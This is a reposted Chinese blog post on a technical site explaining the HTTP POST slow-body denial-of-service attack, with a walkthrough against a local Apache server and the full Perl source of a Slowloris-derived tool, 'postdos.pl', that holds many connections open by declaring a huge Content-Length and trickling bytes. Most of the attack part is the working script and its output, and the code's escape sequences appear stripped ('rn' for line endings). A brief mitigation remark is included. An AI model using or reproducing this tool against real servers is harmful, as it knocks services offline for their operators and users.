Chinaunix首页 | 论坛 | 博客

chris_mu001的ChinaUnix博客

首页 |  博文目录 |  关于我

chris_mu001

  • 博客访问: 12436
  • 博文数量: 6
  • 博客积分: 10
  • 博客等级: 民兵
  • 技术积分: 10
  • 用 户 组: 普通用户
  • 注册时间: 2011-02-21 16:56
文章分类

全部博文(6)

文章存档

2013年(6)

我的朋友
最近访客
推荐博文
相关博文
浅谈HTTP POST DOS拒绝服务攻击

分类: 网络与安全

2013-03-26 15:15:17

原文地址:浅谈HTTP POST DOS拒绝服务攻击 作者:xcgsnowdrop

DDOS又称为分布式拒绝服务,全称是Distributed Denial of ServiceDDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是拒绝服务

        常见的DDOS攻击有SYN floodUDP floodICMP flood等。其中SYN flood是一种最为经典的DDOS攻击。其利用的是TCP协议设计中的缺陷,属于网络层DDOS,此处先避开不谈。
        除了网络层DDOS外,还有应用层DDOS,前面谈过的Slowloris即是其中一种【http://blog.chinaunix.net/uid-26696966-id-3510191.html】,下面接着讨论另外一种应用层DDOS。
        在2010年的OWASP大会上,Wong Onn Chee和Tom Brennan演示了一种类似于Slowloris效果的攻击方法,作者称之为HTTP POST D.O.S。其原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。
        首先构造一个大Content-Length值的完整请求:
         "POST / HTTP/1.1\r\n"
         "Host: host\r\n"
         "Connection: keep-alive\r\n"
         "Keep-Alive: 900\r\n"
         "Content-Length: 100000000\r\n"
         "Content-Type: application/x-www-form-urlencoded\r\n"
         "Accept: *.*\r\n"
         "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n\r\n";
        由于HTTP Requst Header中有设置Keep-Alive,且请求的Method为POST,故服务器在收到该请求后,会等待客户端发送POST数据,此时客户端再以很低的速度向服务器发送数据
        z
        当构造多个连接后,服务器的连接数很快就会达到上限。其核心代码置于文章底部,记为postdos.pl,下面开始使用该脚本工具演示如何使用POST DOS攻击使Web Server拒绝服务:

        一,准备工作

        1.在本机安装配置好Apache2.x,设置MaxClients为50

        2.在Browser中访问,结果显示正常

        3.下载或编写postdos.pl脚本
        二,开始阶段
        1.正式开始发送大Content-Length的完整请求,攻击Web Server使其拒绝服务。注:因此处我们已将Apache的MaxClients设置为50,故此处使用51个不完整连接已足够,另外,因为Keep-Alive时间为900,故两次发送POST数据的间隔时间timeout控制在小于900的范围即可。
        perl postdos.pl -dns 127.0.0.1 -timeout 200 -num 51
        Defaulting to port 80.
        Defaulting to a 5 second tcp connection timeout.
        Multithreading enabled.
        Connecting to 127.0.0.1:80 every 200 seconds with 51 sockets:
                    Building sockets.
                    Building sockets.
                    Sending data.
        Current stats: PostDos has now sent 275 packets successfully.
                    This thread now sleeping for 200 seconds...
                    Sending data.

        ......

        三,验证结果

        1.使用chrome或firefox并打开其debug工具,继续访问,则可发型在HttpRequest发出去后,HttpResponse一直没有收到,出于等待状态。
        2.成功实施攻击后会留下如下错误日志(Apache):
        [Thu Mar 07 16:55:40 2013] [error] server reached MaxClients setting, consider raising the MaxClients setting

        总结:由此可知,这种攻击的本质也是针对Apache的MaxClients限制的。要解决此类问题,可以使用Web应用防火墙,或者一个定制的Web Server安全模块。

        【注:本文引用了“白帽子讲Web安全”部分定义内容,postdos脚本如下】

点击(此处)折叠或打开

  1. #!/usr/bin/perl -w
  2. use strict;
  3. use IO::Socket::INET;
  4. use IO::Socket::SSL;
  5. use Getopt::Long;
  6. use Config;

  8. $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors

  10. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
  11. my ( $cache, $ssl, $rand, $tcpto );
  12. my $result = GetOptions(
  13.     'shost=s' => $shost,
  14.     'dns=s' => $host,
  15.     'num=i' => $connections,
  16.     'cache' => $cache,
  17.     'port=i' => $port,
  18.     'https' => $ssl,
  19.     'tcpto=i' => $tcpto,
  20.     'test' => $test,
  21.     'timeout=i' => $timeout,
  22.     'version' => $version,
  23. );

  25. if ($version) {
  26.     print "Version 0.7n";
  27.     exit;
  28. }

  30. unless ($host) {
  31.     print "Usage:nntperl $0 -dns [] -optionsn";
  32.     print "ntType 'perldoc $0' for help with options.nn";
  33.     exit;
  34. }

  36. unless ($port) {
  37.     $port = 80;
  38.     print "Defaulting to port 80.n";
  39. }

  41. unless ($tcpto) {
  42.     $tcpto = 5;
  43.     print "Defaulting to a 5 second tcp connection timeout.n";
  44. }

  46. unless ($test) {
  47.     unless ($timeout) {
  48.         $timeout = 100;
  49.         print "Defaulting to a 100 second re-try timeout.n";
  50.     }
  51.     unless ($connections) {
  52.         $connections = 1000;
  53.         print "Defaulting to 1000 connections.n";
  54.     }
  55. }

  57. my $usemultithreading = 0;
  58. if ( $Config{usethreads} ) {
  59.     print "Multithreading enabled.n";
  60.     $usemultithreading = 1;
  61.     use threads;
  62.     use threads::shared;
  63. } else {
  64.     print "No multithreading capabilites found!n";
  65.     print "Slowloris will be slower than normal as a result.n";
  66. }

  68. my $packetcount : shared = 0;
  69. my $failed : shared = 0;
  70. my $connectioncount : shared = 0;

  72. srand() if ($cache);

  74. if ($shost) {
  75.     $sendhost = $shost;
  76. } else {
  77.     $sendhost = $host;
  78. }

  80. print "Connecting to $host:$port every $timeout seconds with $connections sockets:n";

  82. if ($usemultithreading) {
  83.     domultithreading($connections);
  84. } else {
  85.     doconnections( $connections, $usemultithreading );
  86. }


  89. sub doconnections {
  90.     my ( $num, $usemultithreading ) = @_;
  91.     my ( @first, @sock, @working );
  92.     my $failedconnections = 0;
  93.     $working[$_] = 0 foreach ( 1 .. $num ); #initializing
  94.     $first[$_] = 0 foreach ( 1 .. $num ); #initializing
  95.     while (1) {
  96.         $failedconnections = 0;
  97.         print "ttBuilding sockets.n";
  98.         foreach my $z ( 1 .. $num ) {
  99.             if ( $working[$z] == 0 ) {
  100.                 if ($ssl) {
  101.                     if (
  102.                         $sock[$z] = new IO::Socket::SSL(
  103.                             PeerAddr => "$host",
  104.                             PeerPort => "$port",
  105.                             Timeout => "$tcpto",
  106.                             Proto => "tcp",
  107.                         )
  108.                       )
  109.                     {
  110.                         $working[$z] = 1;
  111.                     }
  112.                     else {
  113.                         $working[$z] = 0;
  114.                     }
  115.                 }
  116.                 else {
  117.                     if (
  118.                         $sock[$z] = new IO::Socket::INET(
  119.                             PeerAddr => "$host",
  120.                             PeerPort => "$port",
  121.                             Timeout => "$tcpto",
  122.                             Proto => "tcp",
  123.                         )
  124.                       )
  125.                     {
  126.                         $working[$z] = 1;
  127.                         $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
  128.                     }
  129.                     else {
  130.                         $working[$z] = 0;
  131.                     }
  132.                 }
  133.                 if ( $working[$z] == 1 ) {
  134.                     if ($cache) {
  135.                         $rand = "?" . int( rand(99999999999999) );
  136.                     } else {
  137.                         $rand = "";
  138.                     }
  139.                     my $primarypayload =
  140.                         "POST /$rand HTTP/1.1rn"
  141.                       . "Host: $sendhostrn"
  142.                      . "Connection: keep-alivern"
  143.                      . "Keep-Alive: 900rn"
  144.                      . "Content-Length: 100000000rn"
  145.                      . "Content-Type: application/x-www-form-urlencodedrn"
  146.                      . "Accept: *.*rn"
  147.                       . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)rnrn";
  148.                     my $handle = $sock[$z];
  149.                     if ($handle) {
  150.                         print $handle "$primarypayload";
  151.                         if ( $SIG{__WARN__} ) {
  152.                             $working[$z] = 0;
  153.                             close $handle;
  154.                             $failed++;
  155.                             $failedconnections++;
  156.                         }
  157.                         else {
  158.                             $packetcount++;
  159.                             $working[$z] = 1;
  160.                         }
  161.                     }
  162.                     else {
  163.                         $working[$z] = 0;
  164.                         $failed++;
  165.                         $failedconnections++;
  166.                     }
  167.                 }
  168.                 else {
  169.                     $working[$z] = 0;
  170.                     $failed++;
  171.                     $failedconnections++;
  172.                 }
  173.             }
  174.         }
  175.         print "ttSending data.n";
  176.         foreach my $z ( 1 .. $num ) {
  177.             if ( $working[$z] == 1 ) {
  178.                 if ( $sock[$z] ) {
  179.                     my $handle = $sock[$z];
  180.                     if ( print $handle "z" ) {
  181.                         $working[$z] = 1;
  182.                         $packetcount++;
  183.                     }
  184.                     else {
  185.                         $working[$z] = 0;
  186.                         #debugging info
  187.                         $failed++;
  188.                         $failedconnections++;
  189.                     }
  190.                 }
  191.                 else {
  192.                     $working[$z] = 0;
  193.                     #debugging info
  194.                     $failed++;
  195.                     $failedconnections++;
  196.                 }
  197.             }
  198.         }
  199.         print "Current stats:tPostDos has now sent $packetcount packets successfully.n
  200.                 This thread now sleeping for $timeout seconds...nn";
  201.         sleep($timeout);
  202.     }
  203. }

  205. sub domultithreading {
  206.     my ($num) = @_;
  207.     my @thrs;
  208.     my $i = 0;
  209.     my $connectionsperthread = 50;
  210.     while ( $i < $num ) {
  211.         $thrs[$i] =
  212.           threads->create( &doconnections, $connectionsperthread, 1 );
  213.         $i += $connectionsperthread;
  214.     }
  215.     my @threadslist = threads->list();
  216.     while ( $#threadslist > 0 ) {
  217.         $failed = 0;
  218.     }
  219. }

  221. __END__


阅读(788) | 评论(0) | 转发(0) |
0

上一篇:如何查询centos查看系统内核版本,系统版本,32位还是64位

下一篇:没有了

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6